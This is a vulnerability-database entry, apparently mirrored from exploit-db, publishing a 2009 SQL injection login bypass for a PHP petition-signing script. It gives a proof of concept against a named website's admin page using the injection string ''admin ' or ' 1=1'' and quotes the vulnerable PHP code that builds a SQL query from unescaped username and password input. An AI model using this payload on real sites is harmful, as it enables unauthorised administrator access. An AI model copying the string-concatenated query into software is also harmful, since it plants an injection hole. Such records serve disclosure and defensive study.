Free PHP Petition Signing Script - Authentication Bypass

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057602 漏洞类型
发布时间 2009-03-27 更新时间 2009-03-27
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/8293
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
||          ||   | ||        
           o_,_7 _||  . _o_7 _|| q_|_||  o_w_,
          ( :   /    (_)    /           (   .  


######################################################
#	Free PHP Petition Signing Script Release     #
# 		Login SQL injection	 	     #
######################################################
#	     Qabandi   | iqa[a]hotmail.fr	     #
                From Kuwait, Peace.
  Salamz: Killer Hack, Ghost-R00t, Mr.Mn7os, Cyb3rT
######################################################
Download: http://www.rediscussed.com/2008/01/18/free-php-petition-signing-script-release/
------------------------------------------------------
-:PoC:-


http://usa-homeland.org/pet/signing_system-admin

Username: admin ' or ' 1=1
Password: nothing


------------vuln--code---------(./signing_system-admin/index.php)

$query = mysql_query("SELECT username,password FROM `accounts` WHERE username='$username' AND password='$password'", $conn) or die(mysql_error());

------------------------------------

# milw0rm.com [2009-03-27]